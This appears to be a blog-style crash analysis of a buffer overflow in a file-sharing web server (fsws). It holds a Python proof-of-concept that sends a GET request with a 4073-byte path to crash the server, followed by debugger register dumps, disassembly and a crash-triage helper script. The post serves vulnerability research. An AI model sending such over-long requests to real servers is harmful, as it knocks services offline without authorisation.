A while ago an overflow exploit for fileshareing2.7 was published. I tried it and it does work, so I also tried to analyze the cause of the vulnerability and locate the overflow point. The process is shared below:
1. Build a trigger program, start the target program under a debugger, and trigger the vulnerability
Based on the overflow verification program provided by metasploit, I wrote a short piece of Python code for testing.
import socket

def pocfileshare():
    # Connect to the target under test (the post runs it locally on port 80)
    ss = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ss.connect(("127.0.0.1", 80))
    # Request line with an over-long path: 4073 'a' bytes, as in the metasploit check
    s_data = "GET "
    s_data += 'a' * 4073
    s_data += " HTTP/1.0\r\n\r\n"
    ss.send(s_data.encode())
    # Read whatever the server answers (it will not answer once it has crashed)
    aa = ss.recv(1000)
    print(aa)
    ss.close()

pocfileshare()
0:004:x86> k
# ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
00 037d6fbf 0042002f fsws+0x1227dd
01 037d75fc 00000000 fsws+0x2002f
0:004:x86> r
eax=7d721800 ebx=00000f07 ecx=61616161 edx=18b99803 esi=037d7200 edi=ffffffff
eip=005227dd esp=037d6fab ebp=037d6fbf iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
fsws+0x1227dd:
005227dd 8b31 mov esi,dword ptr [ecx] ds:002b:61616161=????????
.text:005227BB ; int __stdcall sub_5227BB(int, int, size_t)
.text:005227BB sub_5227BB proc near ; CODE XREF: sub_401FD0+70p
.text:005227BB ; .text:004023F5p ...
.text:005227BB
.text:005227BB var_10 = dword ptr -10h
.text:005227BB var_C = dword ptr -0Ch
.text:005227BB var_4 = dword ptr -4
.text:005227BB arg_0 = dword ptr 8
.text:005227BB arg_4 = dword ptr 0Ch
.text:005227BB arg_8 = dword ptr 10h
.text:005227BB
.text:005227BB mov eax, offset loc_56205B
.text:005227C0 call __EH_prolog
.text:005227C5 push ecx
.text:005227C6 mov edx, [ebp+arg_4]
.text:005227C9 and [ebp+var_10], 0
.text:005227CD test edx, edx
.text:005227CF jge short loc_5227D3
.text:005227D1 xor edx, edx
.text:005227D3
.text:005227D3 loc_5227D3: ; CODE XREF: sub_5227BB+14j
.text:005227D3 mov eax, [ebp+arg_8]
.text:005227D6 test eax, eax
.text:005227D8 jge short loc_5227DC
.text:005227DA xor eax, eax
.text:005227DC
.text:005227DC loc_5227DC: ; CODE XREF: sub_5227BB+1Dj
.text:005227DC push esi
.text:005227DD mov esi, [ecx] ; The faulting location: ecx=0x61616161. As the code shows, up to this point the function itself has not modified ecx, so the value must already have been corrupted when it was passed in, before this function was called. Where, then, did it go wrong?
.text:005227DF push edi
.text:005227E0 lea edi, [edx+eax]
.text:005227E3 mov esi, [esi-8]
.text:005227E6 cmp edi, esi
.text:005227E8 jle short loc_5227EE
.text:005227EA mov eax, esi
.text:005227EC sub eax, edx
0:008:x86> k
# ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
00 031d7168 0042ebd0 fsws+0x1227bb
01 031d7218 0042d32e fsws+0x2ebd0 ; very likely the location of the code that went wrong
02 031d7524 0040faa0 fsws+0x2d32e ; most probably the problem is in the function it calls.
The breakpoint should be set at: fsws+0x2d329
03 031eff50 004f9a46 fsws+0xfaa0
04 031eff88 7673338a fsws+0xf9a46
05 031eff94 77929902 kernel32!BaseThreadInitThunk+0xe
06 031effd4 779298d5 ntdll32!__RtlUserThreadStart+0x70
07 031effec 00000000 ntdll32!_RtlUserThreadStart+0x1b
0:000:x86> g
Breakpoint 0 hit
fsws+0x1227bb:
005227bb b85b205600 mov eax,offset fsws+0x16205b (0056205b)
0:008:x86> r
eax=00000000 ebx=00000f07 ecx=61616161 edx=009794e0 esi=031d7200 edi=ffffffff
eip=005227bb esp=031d6fc3 ebp=031d75fc iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
fsws+0x1227bb:
005227bb b85b205600 mov eax,offset fsws+0x16205b (0056205b)
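As an added triage helper (not from the original post), the script below parses the WinDbg `r` output quoted above, flags registers that consist entirely of the request filler byte, and checks whether the faulting instruction dereferences one of them, which is the reasoning the post applies by hand to ecx=0x61616161 and mov esi,[ecx]. The dump string is copied from the first crash above; the function and constant names are my own.

```python
import re

# Constructed input: the WinDbg "r" output and faulting instruction copied from
# the first crash above, embedded here so the helper runs offline.
CRASH_DUMP = """\
eax=7d721800 ebx=00000f07 ecx=61616161 edx=18b99803 esi=037d7200 edi=ffffffff
eip=005227dd esp=037d6fab ebp=037d6fbf iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
fsws+0x1227dd:
005227dd 8b31 mov esi,dword ptr [ecx] ds:002b:61616161=????????
"""

# 32-bit general registers plus eip as printed by WinDbg's "r" command.
REG_RE = re.compile(r"\b(e[abcd]x|e[sd]i|e[sb]p|eip)=([0-9a-f]{8})")
# "<addr> <opcode bytes> <mnemonic> <operands> ds:..." line WinDbg prints at a fault.
FAULT_RE = re.compile(r"^([0-9a-f]{8})\s+[0-9a-f]+\s+(\w+)\s+(.*?)\s+ds:", re.M)

def parse_registers(dump):
    """Return {name: value} for every register in the dump."""
    return {name: int(val, 16) for name, val in REG_RE.findall(dump)}

def tainted_registers(regs, filler_byte):
    """Names of registers whose four bytes all equal the request filler byte.

    A register holding 'aaaa' (0x61616161) after a request of 4073 'a's is
    almost certainly overwritten by that request rather than a legitimate value.
    """
    filler = int.from_bytes(bytes([filler_byte]) * 4, "little")
    return sorted(name for name, val in regs.items() if val == filler)

def faulting_access(dump):
    """(address, mnemonic, operands) of the instruction that faulted, or None."""
    m = FAULT_RE.search(dump)
    return (int(m.group(1), 16), m.group(2), m.group(3)) if m else None

def triage(dump, filler_byte=ord("a")):
    """Summarise the crash: where it is, which registers are filled with the
    request byte, and whether the faulting instruction dereferences one of them
    (a read through a corrupted pointer, which is the post's mov esi,[ecx] case)."""
    regs = parse_registers(dump)
    tainted = tainted_registers(regs, filler_byte)
    fault = faulting_access(dump)
    deref_tainted = fault is not None and any(f"[{r}]" in fault[2] for r in tainted)
    return {"eip": regs.get("eip"), "tainted": tainted,
            "fault": fault, "deref_tainted": deref_tainted}

if __name__ == "__main__":
    print(triage(CRASH_DUMP))
```

Pasting the `r` output of the breakpoint hit at fsws+0x1227bb instead of the crash gives the same tainted register with no fault line, which confirms that ecx is already corrupted on entry.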